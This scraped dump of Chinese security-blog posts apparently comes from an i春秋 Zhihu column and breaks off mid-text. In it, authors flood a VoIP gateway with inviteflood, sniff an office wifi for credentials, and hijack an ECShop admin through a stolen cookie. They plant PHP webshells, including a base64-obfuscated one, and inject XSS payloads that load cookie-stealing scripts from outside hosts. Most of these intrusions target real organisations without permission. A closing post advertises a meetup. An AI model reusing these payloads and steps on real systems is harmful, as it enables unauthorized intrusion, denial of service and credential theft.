这咋办,看着这个网页就犯愁,瞎蒙吧,看见啥蒙啥被,最后看到了设备名称,也就是那个大大的 mx120,密码账号都是,,上去了发现没有卵用啊,看日志也没有什么东西,只有 登录的记录,紧接着在配置页面发现了一条注释,大致意思是,请修改默认5060端口以防止泛洪攻击,让我刷的一下眼前一亮,泛洪攻击啊,这明显就是dos攻击啊,然后就去谷歌了一下,关于voip的相关漏洞文档和kali下的voip模块,,结果还真有,\u003C\u002Fp\u003E\u003Cimg src=\&v2-34db2c75e701c5f07ca03ba.png\& data-rawwidth=\&1272\& data-rawheight=\&507\&\u003E\u003Cp\u003E
恰好,kali下有相关的工具 针对
voip服务的压力测试,简单的看了一下参数 ,测试了一下,确实好用啊,以下是相关的参数以及用途\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cb\u003Eroot@kali:~# inviteflood eth0 .10.9 192.168.10.9 5C\u002Fb\u003E \u003Cb\u003E接口\u003C\u002Fb\u003E \u003Cb\u003E目标主机名\u003C\u002Fb\u003E \u003Cb\u003E目标ip
发送的数据包大小\u003C\u002Fb\u003E \u003Cb\u003Einviteflood - Version 2.0\u003C\u002Fb\u003E \u003Cb\u003E
June 09, C\u002Fb\u003E \u003Cb\u003Esource IPv4 addr:port
= 192.168.11.209:9\u003C\u002Fb\u003E \u003Cb\u003Edest
IPv4 addr:port
= 192.168.10.9:C\u002Fb\u003E \u003Cb\u003Etargeted UA
= [email].10.9[\u002Femail]\u003C\u002Fb\u003E \u003Cb\u003EFlooding destination with 50000 packets\u003C\u002Fb\u003E \u003Cb\u003Esent: 50000
\u003Cbr\u003E\u003C\u002Fb\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E
以发送五万的数据包就可以造成语音网关未响应的情况,让我不由得眼前一亮,这要是干销售,想休息,直接打一会,哈哈 都歇着,哈哈\u003C\u002Fp\u003E\u003Cimg src=\&v2-d9cb4b14a81daa69db582.png\& data-rawwidth=\&1216\& data-rawheight=\&209\&\u003E\u003Cp\u003E
在搜索该工具的相关使用方法的时候 发现了更好玩的东西,恩 和我们的标题契合了,那就是 通过谷歌进行搜索的时候发现了可以通过伪造数据包,以达到变号的目的,,该工具已经集成在了msf中,当时简单的测试了一下,却忘了截图,\u003C\u002Fp\u003E\u003Cimg src=\&v2-5d808b2f2311ddcda5ba3.png\& data-rawwidth=\&809\& data-rawheight=\&451\&\u003E\u003Cp\u003E
当时试了很多遍才成功,但大体的思路记住了,那就是直接用msf的模块,其实msf的模块只要记住模块的名字,直接search就好了,记不住模块就有点伤不起了,另一个 和msf模块类似 也就是上面说的那个,通过伪造数据包,篡改来电话号,这个电话号大家不要误会,不是我们使用的 十一位的电话,而是指座机电话,\u003C\u002Fp\u003E\u003Cimg src=\&v2-51d83c643c85ae2a4c3f82.png\& data-rawwidth=\&814\& data-rawheight=\&658\&\u003E\u003Cp\u003E
在此不妨给大家屡屡思路,先说这个工具的作用吧,第一他能针对 语音网关进行dos攻击,导致语音网关宕机,第二,可以发送虚拟数据包,给另一个座机打电话,(能不能给手机打没测试,但估计够呛)第三点
第四点,,大家脑洞大开吧,\u003C\u002Fp\u003E\u003Cimg src=\&v2-598c0bbe20c29a180dcaf1.png\& data-rawwidth=\&824\& data-rawheight=\&734\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x03反思:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E本文中涉及到的漏洞有那几个?\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E首先是弱口令,使用了设备的默认密码,\u003C\u002Fp\u003E\u003Cp\u003E第二,由于开发人员失职,未修改默认数据端口,导致可以轻松根据默认端口进行拒绝服务攻击,\u003C\u002Fp\u003E\u003Cp\u003E第三,管理人员失职,该漏洞经上报与上级,却并未正视问题所在,再三推脱却不予修复\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x04总结:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E “任何带电的都可以被黑”\u003C\u002Fb\u003E忘了是在哪里看到的一句话了,我觉得并不是在开玩笑,也不是无稽之谈,看看现在用的这些设备,有很多设备都离不开了电,若有一天,电 消失了,我们又该怎样?,在反观企业,在外表宣传的如何如何的坚固,网站如何如何的安全,却总是忽视了内网的\u003Cu\u003E\u003Ca href=\&http:\u002F\u002Fwww.ichunqiu.com\u002Fmain?bbs\&\u003E网络安全\u003C\u002Fa\u003E\u003C\u002Fu\u003E,最终还是功亏一篑,\u003C\u002Fp\u003E&,&updated&:new Date(&T08:45:48.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:9,&likeCount&:18,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T16:45:48+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-edabd7bbbe0be4fa54c6b2_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:9,&likesCount&:18},&&:{&title&:&蹭你wifi后 我竟然干了这样的事&,&author&:&yin-chang-ni&,&content&:&\u003Cblockquote\u003E作者:\u003Ci\u003Ejasonx\u003C\u002Fi\u003E\u003Cbr\u003E来源:\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ei春秋社区\u003C\u002Fa\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E前言:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E故事发生在前两天,我们去参观工业园区内一家电商公司。\u003C\u002Fp\u003E\u003Cp\u003E去参观他们公司的时候,我说要用下无线网,他们技术说密码就是他们的网站域名,我一脸懵逼表示我不知道域名,然后对方接过我手机给我连上了他们wifi。\u003C\u002Fp\u003E\u003Cp\u003E然后就有了后面的故事。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x01 邪恶的想法\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E在回来的时候,我注意到,他们公司在二楼,在楼下wifi信号也还好,然后我心中萌生了一个邪恶的想法。(?*?*?)\u003C\u002Fp\u003E\u003Cp\u003E为了掩人耳目,我回公司带上我笔记本开车再次来到他们楼下(在一个园区里很近)\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E熄火后我打开笔记本,准备连接他们wifi,那么问题来了,我蹭网的时候,密码是他们技术给我输入的,我不知道密码啊?\u003C\u002Fp\u003E\u003Cp\u003E然鹅,这都不是事,哈哈。(小兄弟看你骨骼惊奇,这个姿势我就免费传授与你吧,希望能助你拯救世界一臂之力。)\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x02 获取wifi密码\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E打开手机上的RootExplorer,切换到根目录。(注意:手机可能需要root后才能安装rootexplorer)\u003C\u002Fp\u003E\u003Cp\u003E打开根目录下的data\u002Fmisc\u002Fwifi\u002Fwpa_supplicant.conf\u003C\u002Fp\u003E\u003Cp\u003E该文件是用来储存wifi连接信息的,包括ssid、psk等等信息。\u003C\u002Fp\u003E\u003Cp\u003E打开后你会发现,刚刚连接的wifi密码什么的都在里面了。\u003C\u002Fp\u003E\u003Cimg src=\&v2-59f10808dbb969c5f2dfb7.jpg\& data-caption=\&\& data-rawwidth=\&349\& data-rawheight=\&618\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x03 信息嗅探\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E笔记本连上wifi后,我在命令行下打开嗅探工具开始嗅探。\u003C\u002Fp\u003E\u003Cp\u003E注意:该工具需要安装WinPcap运行库才能正常运行。\u003C\u002Fp\u003E\u003Cp\u003E以下是工具的使用参数\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E1xx.exe -idx 1 -ip 192.168.1.2-192.168.1.254 -port 80 -logfilter “+POST ,+GET ,+username,+password” -save_a save.log\u003C\u002Fcode\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E几分钟以后,我们发现抓取到很多数据包。
\u003C\u002Fp\u003E\u003Cimg src=\&v2-f222c59e52e4675dafc563d5b0ee4cee.jpg\& data-caption=\&\& data-rawwidth=\&662\& data-rawheight=\&433\&\u003E\u003Cp\u003E因为生成的记录文件比较大,我们用notepad++打开。 ctrf+f查找关键词:password、username、cookie等等敏感关键词。 通过查找我发现局域网下有人在登录ecshop系统的后台,虽然没抓到密码,但是我们抓到了cookie。
\u003C\u002Fp\u003E\u003Cimg src=\&v2-65f5f8b1d91d682c4b58.jpg\& data-caption=\&\& data-rawwidth=\&927\& data-rawheight=\&474\&\u003E\u003Cp\u003E\u003Cb\u003E0x04 cookie欺骗\u003C\u002Fb\u003E \u003C\u002Fp\u003E\u003Cp\u003E现在我们打开cookie修改工具,输入他后台地址,然后点击进入,会获取到一个未登录的cookie。
\u003C\u002Fp\u003E\u003Cimg src=\&v2-dbcd51a257abc9958bbc54e.jpg\& data-caption=\&\& data-rawwidth=\&790\& data-rawheight=\&668\&\u003E\u003Cp\u003E然后把抓到的cookie复制到工具里面,点击右边的强制修改,提示修改完成后成功进入后台。\u003C\u002Fp\u003E\u003Cimg src=\&v2-f3fe6a127db.jpg\& data-caption=\&\& data-rawwidth=\&781\& data-rawheight=\&652\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x05 sql写shell\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E进入后台后才发现,这应该是个子账号,只拥有上传商品的权限。\u003C\u002Fp\u003E\u003Cp\u003E数据库管理下有个数据库备份,想通过新建一个会员,会员名称设置成一句话,然后备份数据库拿shell的,但是发现会员管理也被权限了。\u003C\u002Fp\u003E\u003Cp\u003E尝试在admin\u002F后面加上sql.php,发现竟然有sql查询权限,明明在数据库管理下没看到有这个选项啊?难道只隐藏了选项,但是还有访问权限?\u003C\u002Fp\u003E\u003Cimg src=\&v2-cd6f4bd88cc.jpg\& data-caption=\&\& data-rawwidth=\&260\& data-rawheight=\&127\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E不管了,既然可以执行sql,那么我们先获取下网站路径,然后直接sql写shell试试。\u003C\u002Fp\u003E\u003Cimg src=\&v2-04ae7e69c88fd564c7a45e.jpg\& data-caption=\&\& data-rawwidth=\&768\& data-rawheight=\&640\&\u003E\u003Cp\u003E访问域名\u002Fapi\u002Fcron.php报错出得出以下路径。\u003C\u002Fp\u003E\u003Cimg src=\&v2-87bdcd2dac25eea00198.jpg\& data-caption=\&\& data-rawwidth=\&540\& data-rawheight=\&225\&\u003E\u003Cp\u003E然后执行sql命令写shell。\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Eselect &#x27;&?php @eval($_POST[cmd])?&&#x27; into outfile &#x27;\u002Fwww\u002Fweb\u002Fxxxxxx\u002Fpublic_html\u002Flog.php&#x27;\u003C\u002Fcode\u003E\u003Cp\u003E脸真黑,报错了,尝试了多种写入方式都以失败告终。
\u003C\u002Fp\u003E\u003Cimg src=\&v2-d31eb27f09281add2bdda4fcefda009c.jpg\& data-caption=\&\& data-rawwidth=\&771\& data-rawheight=\&283\&\u003E\u003Cp\u003E\u003Cb\u003E0x06 权限突破\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E经历了各种碰壁之后,突然灵机一动,这不是可以查询数据库吗?直接查admin所在表不就出数据了?\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E于是说干就干,sql查询框输入以下命令\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Eselect * from ecs_admin_user\u003C\u002Fcode\u003E\u003Cimg src=\&v2-8b819ccd042151bcb25bfcc3433fb72c.jpg\& data-caption=\&\& data-rawwidth=\&784\& data-rawheight=\&332\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E成功查询出所有管理员账号,第一个就是超级用户,拿到md5后直接去解密,拿到明文。 (?????) \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x07 换管理员账号拿shell\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E拿到超级用户的账号密码后,我们重新登录后台,输入账号密码。\u003C\u002Fp\u003E\u003Cp\u003E因为是超级用户,已经拥有所有权限,我们找到左侧的语言项编辑,然后在右边输入\&用户信息\&(没有引号),然后搜索。\u003C\u002Fp\u003E\u003Cp\u003E把搜索出来的\&用户信息\&修改成以下代码,然后保存。\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E用户信息${${fputs(fopen(base64_decode(aWNxLnBocA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}\u003C\u002Fcode\u003E\u003Cimg src=\&v2-a11a6ea271a5e8dc573d35d82d51a3c2.jpg\& data-caption=\&\& data-rawwidth=\&906\& data-rawheight=\&324\&\u003E\u003Cp\u003E然后我们访问 域名\u002Fuser.php 会在网站根目录下生成一个icq.php的一句话文件,密码x
\u003C\u002Fp\u003E\u003Cimg src=\&v2-4f71cc0e1e31e15a0b107d.jpg\& data-caption=\&\& data-rawwidth=\&817\& data-rawheight=\&534\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E写在最后:办公网络最好和访客网络隔离。\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E本文属于i春秋原创为文章现金奖励计划,未经允许,严禁转载。\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E文中所用工具需到原帖回复后获取:\u003C\u002Fb\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003E蹭你wifi后 我竟然干了这样的事\u003C\u002Fa\u003E\u003C\u002Fp\u003E&,&updated&:new Date(&T07:43:35.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:41,&likeCount&:155,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T15:43:35+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-462bc22e4d7fa77e5cba3ae26308d54b_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:41,&likesCount&:155},&&:{&title&:&攻破黑市最流行的钓鱼网站(第二弹)&,&author&:&yin-chang-ni&,&content&:&\u003Cp\u003E上次有人向我反映,我讲的过于快了,不适合菜鸟看,所以这次我写的相对来说比较详细~ 这对于有基础的人来说可能比较煎熬,哈哈。大家秒懂的部分可以跳过~~ \u003C\u002Fp\u003E\u003Cp\u003E也可以看看我的第一篇:《\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003E攻破黑市最流行的钓鱼网站\u003C\u002Fa\u003E》。\u003C\u002Fp\u003E\u003Cp\u003E这次的比较简单:对一个目标网站进行白盒测试,\u003C\u002Fp\u003E\u003Cimg src=\&v2-bf49dfcefed628d58d6208b.jpg\& data-caption=\&\& data-rawwidth=\&1268\& data-rawheight=\&625\&\u003E\u003Cp\u003E这是后台\u003C\u002Fp\u003E\u003Cimg src=\&v2-2aacb6f1e65ccdab0679d77.jpg\& data-caption=\&\& data-rawwidth=\&1267\& data-rawheight=\&447\&\u003E\u003Cp\u003E可以看到,这边是一个钓鱼网站\u003C\u002Fp\u003E\u003Cp\u003E对目标进行XSS白盒测试\u003C\u002Fp\u003E\u003Cp\u003E点击领取礼包,这里会弹出一个登录框\u003C\u002Fp\u003E\u003Cimg src=\&v2-49b7cc9bdfa44f187108f.jpg\& data-caption=\&\& data-rawwidth=\&1034\& data-rawheight=\&551\&\u003E\u003Cp\u003E我们随便输入一个账户密码\u003C\u002Fp\u003E\u003Cp\u003E通过抓包修改里面的参数\u003C\u002Fp\u003E\u003Cimg src=\&v2-c4eba7a3db67a381d20a.jpg\& data-caption=\&\& data-rawwidth=\&1076\& data-rawheight=\&360\&\u003E\u003Cp\u003E目测,这里就两个参数可以测试, 一个user 一个password\u003C\u002Fp\u003E\u003Cp\u003E放上自己最常用的payload 在password 内\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Euser=&password=123123\&&&img\u002Fsrc=1 onerror=alert(\&1\&&\u002F\u002F&submit=%E7%99%BB%E5%BD%95\u003C\u002Fcode\u003E\u003Cp\u003E\&& 是闭合标签&img\u002Fsrc=1 onerror=alert(\&1\&& 是弹窗\u002F\u002F为注释掉后面的语法\u003C\u002Fp\u003E\u003Cp\u003E现在我们进入后台查看,\u003C\u002Fp\u003E\u003Cimg src=\&v2-ca1deb71bf9eecfeb949a5.jpg\& data-caption=\&\& data-rawwidth=\&625\& data-rawheight=\&176\&\u003E\u003Cp\u003E可以看到,很明显的,我们的img标签已经执行成功了,但是没有弹窗,这是为啥?\u003C\u002Fp\u003E\u003Cp\u003E对其右击-查看源码\u003C\u002Fp\u003E\u003Cimg src=\&v2-8fc194e6a6e6f9f9f14055.jpg\& data-caption=\&\& data-rawwidth=\&383\& data-rawheight=\&79\&\u003E\u003Cp\u003E查看他的属性,我们发现,alert后面的语句没有执行? 那么,我们换个标签试试\u003C\u002Fp\u003E\u003Cp\u003E再次请求数据\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Euser=&password=123123\&&&style\u002Fonload=alert(1)&\u002F\u002F&submit=%E7%99%BB%E5%BD%95\u003C\u002Fcode\u003E\u003Cimg src=\&v2-5fd8218568e.jpg\& data-caption=\&\& data-rawwidth=\&1058\& data-rawheight=\&303\&\u003E\u003Cp\u003E这次进到后台查看\u003C\u002Fp\u003E\u003Cimg src=\&v2-ad507a89d5ee78f7bd074b.jpg\& data-caption=\&\& data-rawwidth=\&371\& data-rawheight=\&188\&\u003E\u003Cp\u003E可以看到,这边已经成功弹窗了\u003C\u002Fp\u003E\u003Cp\u003E然后就应该开始构造payload 啊~走起,引用我的XSS站点URL 构造的payload 应该为\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E“&&img\u002Fsrc=1\u002F&\u002F\u002F\u003C\u002Fcode\u003E\u003Cp\u003E红色的”&部分为闭合前边的标签黄色的\u002F\u002F 为注释掉后面的语句&img\u002Fsrc=1\u002F&
这句代码主要就是引用我们XSS平台的代码,主要达到一个盗取对方cookie的效果\u003C\u002Fp\u003E\u003Cimg src=\&v2-d4c6bd4a42a5ded.jpg\& data-caption=\&\& data-rawwidth=\&1161\& data-rawheight=\&111\&\u003E\u003Cp\u003E然后我们再一次提交数据\u003C\u002Fp\u003E\u003Cimg src=\&v2-ff4b5ed507a4afa.jpg\& data-caption=\&\& data-rawwidth=\&738\& data-rawheight=\&386\&\u003E\u003Cp\u003E在password 参数里,也就是密码处添加payload,\u003C\u002Fp\u003E\u003Cimg src=\&v2-685a64f2c7f717b03eb1c808a5e5d2e0.jpg\& data-caption=\&\& data-rawwidth=\&1130\& data-rawheight=\&87\&\u003E\u003Cp\u003E结果后台数据没有显示。\u003C\u002Fp\u003E\u003Cp\u003E凭着经验判断,可能是对某个字符进行了过滤,但是我自己也不知道是哪个,所以只能不断的测试 对payload编码试试。\u003C\u002Fp\u003E\u003Cp\u003E那么使用String.fromCharCode 函数进行转换吧~~什么是String.fromCharCode函数转换呢?打个比方~ 我们把alert(\&1\&) 进行转换,\u003C\u002Fp\u003E\u003Cimg src=\&v2-09afb54ce7401cc3cdb9.jpg\& data-caption=\&\& data-rawwidth=\&599\& data-rawheight=\&410\&\u003E\u003Cp\u003E那么我们在 标签输入试试,\u003C\u002Fp\u003E\u003Cimg src=\&v2-168cd349c6abdd2e9cd1.jpg\& data-caption=\&\& data-rawwidth=\&688\& data-rawheight=\&66\&\u003E\u003Cp\u003E在页面上显示弹窗\u003C\u002Fp\u003E\u003Cimg src=\&v2-ba6d65d1aaac076ec1189b7.jpg\& data-caption=\&\& data-rawwidth=\&298\& data-rawheight=\&194\&\u003E\u003Cp\u003E那么我构造的payload 就应该为,\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E\&&&svg\u002Fonload=eval((String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,118,47,88,65,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59)))&\u002F\u002F\u003C\u002Fcode\u003E\u003Cp\u003E再次请求数据,把这段payload 放到 password 参数里,\u003C\u002Fp\u003E\u003Cimg src=\&v2-78de3e832fba9ba067b828da.jpg\& data-caption=\&\& data-rawwidth=\&1138\& data-rawheight=\&151\&\u003E\u003Cp\u003E然后我们进入后台查看\u003C\u002Fp\u003E\u003Cimg src=\&v2-8f54ef6ef.jpg\& data-caption=\&\& data-rawwidth=\&1212\& data-rawheight=\&354\&\u003E\u003Cp\u003E好像,应该,或许成功了吧,我们查看源码试试\u003C\u002Fp\u003E\u003Cimg src=\&v2-1089997adead4c72fdae5ecf41e77f88.jpg\& data-caption=\&\& data-rawwidth=\&1414\& data-rawheight=\&825\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E不行, 后来我又试了上百种payload,最终发现,这货是在服务器端限制了字符数。。。。。。。。。。。。。。。 也就是说,我们用最短的payload 弹窗可以,但是如果需要引用 自己恶意站点的URL,就需要大量的代码,这样的话就”根本”的防止了我们构造~ \u003C\u002Fp\u003E\u003Cp\u003E还好,我之前看过 剑心的 跨站拆分法 (在这里为他默哀3秒~)\u003C\u002Fp\u003E\u003Cp\u003E何为跨站拆分?简单理解,就是一大块蛋糕放不进去冰箱,我们把它切成一小块一小块的放进去。\u003C\u002Fp\u003E\u003Cp\u003E例子:\u003C\u002Fp\u003E\u003Cimg src=\&v2-d320cea09ffe2c6e1e42.jpg\& data-caption=\&\& data-rawwidth=\&447\& data-rawheight=\&186\&\u003E\u003Cp\u003E你们自己在脚本里输入看看,最终的效果是什么\u003C\u002Fp\u003E\u003Cp\u003E好的,现在我们做一个最简单的测试\u003C\u002Fp\u003E\u003Cimg src=\&v2-de1e4eb6a4b4.jpg\& data-caption=\&\& data-rawwidth=\&377\& data-rawheight=\&109\&\u003E\u003Cp\u003E给变量a赋值为0;然后弹出变量a\u003C\u002Fp\u003E\u003Cimg src=\&v2-c043e70cc889b6419cbcc.jpg\& data-caption=\&\& data-rawwidth=\&334\& data-rawheight=\&172\&\u003E\u003Cp\u003E现在我们把代码一一的放入进入 输入账号密码,抓包修改\u003C\u002Fp\u003E\u003Cp\u003E在后台查看下, \u003C\u002Fp\u003E\u003Cimg src=\&v2-c087eef6aab5c4413cca274.jpg\& data-caption=\&\& data-rawwidth=\&794\& data-rawheight=\&55\&\u003E\u003Cimg src=\&v2-e4aa861d3a9ba5.jpg\& data-caption=\&\& data-rawwidth=\&536\& data-rawheight=\&149\&\u003E\u003Cp\u003E成功保存。\u003C\u002Fp\u003E\u003Cp\u003E输入账号密码,抓包修改,\u003C\u002Fp\u003E\u003Cimg src=\&v2-87da5cf7ee52ef.jpg\& data-caption=\&\& data-rawwidth=\&1287\& data-rawheight=\&351\&\u003E\u003Cp\u003E输入完,第二段代码,让着两段叠加,那么他们就应该弹窗了吧~\u003C\u002Fp\u003E\u003Cimg src=\&v2-385991ededcea044dfa574.jpg\& data-caption=\&\& data-rawwidth=\&375\& data-rawheight=\&215\&\u003E\u003Cp\u003E现在来开始构造我们的站点吧~~\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E&script&z=&#x27;document&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;.write(\&&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;&script&#x27;&\u002Fscript&\n \n&script&z=z+&#x27; src=ht&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;tp:\u002F\u002Fxss&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;.sssie&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;.com\u002FF&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;MD27h&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;&&\u002Fsc&#x27;&\u002Fscript&\n \n&script&z=z+&#x27;ript&\&)&#x27;&\u002Fscript&\n \n&script&alert(z)&\u002Fscript&\n \n&script&eval(z)&\u002Fscript&\u003C\u002Fcode\u003E\u003Cp\u003E逐个放进去即可 然后就拿到了对方的cookie\u003C\u002Fp\u003E\u003Cp\u003E我把我在一个论坛里的XSS教程买了下来,我看了下,由易到难,不知道对大家有没有帮助。\u003C\u002Fp\u003E&,&updated&:new Date(&T07:18:18.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:12,&likeCount&:60,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T15:18:18+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-b728ca08481dfd574c40_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:12,&likesCount&:60},&&:{&title&:&i春秋白帽城市圈北京站邀请您加入交(chi)流(he)学(wan)习(le)&,&author&:&yin-chang-ni&,&content&:&\u003Cp\u003E\u003Cb\u003E【i春秋\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003E白帽\u003C\u002Fa\u003E城市圈北京站邀请您加入】\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003Ei春秋学院是国内领先的\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003E信息安全\u003C\u002Fa\u003E教育平台,在安全领域有极其丰富的成果和资源。近期为帮助白帽更好的成长,i春秋将成立白帽子城市圈,第一站是北京,目的在于建立真实可靠的白帽交友圈,通过线下沙龙\u002F活动进行交(chi)流(he)学(wan)习(le)的知识分享玩耍群。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E【第一期聚会主题:“当AI遇见安全”】\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E由OASES智能终端生态安全联盟组织,将由\u003Cb\u003E百度、华为等著名企业的顶级专家做技术分享。\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E我们包晚餐:最happy的晚宴,龙虾Party尽情享用!\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-ce97463d61ea.jpg\& data-caption=\&【图片仅作展示,实际会比这多很多。。】\& data-rawwidth=\&1200\& data-rawheight=\&797\&\u003E\u003Cp\u003E\u003Cb\u003E时间:11月6号下午1点\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E地点:北京千禧酒店\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E加入方式:请仔细阅读以下内容加入白帽北京圈,这仅仅只是第一期,未来还会有很多福利。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E白帽圈福利:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E1.各类顶级的安全会议门票帮你搞定或优惠;\u003C\u002Fp\u003E\u003Cp\u003E2.不定期线下聚会包你们吃喝玩乐学;\u003C\u002Fp\u003E\u003Cp\u003E3.安全圈各大厂商\u002F企业招聘需求共享\u002F内推;\u003C\u002Fp\u003E\u003Cp\u003E4.安全众测项目优先参与权。\u003C\u002Fp\u003E\u003Cp\u003E5.认识同一个城市的白帽圈友们,扩大交际圈。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E加入群(圈子)要求:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E1.必须在北京或周边城市,由于是真实交友圈,请在以下链接内认真填写基础信息,以备验证;\u003C\u002Fp\u003E\u003Cp\u003E2.必须提交过中危及以上的有效漏洞;\u003C\u002Fp\u003E\u003Cp\u003E3.在群里必须保持活跃度,长期潜水的将被清理哦;\u003C\u002Fp\u003E\u003Cp\u003E4.最重要的一点:热爱安全技术,热爱i春秋。\u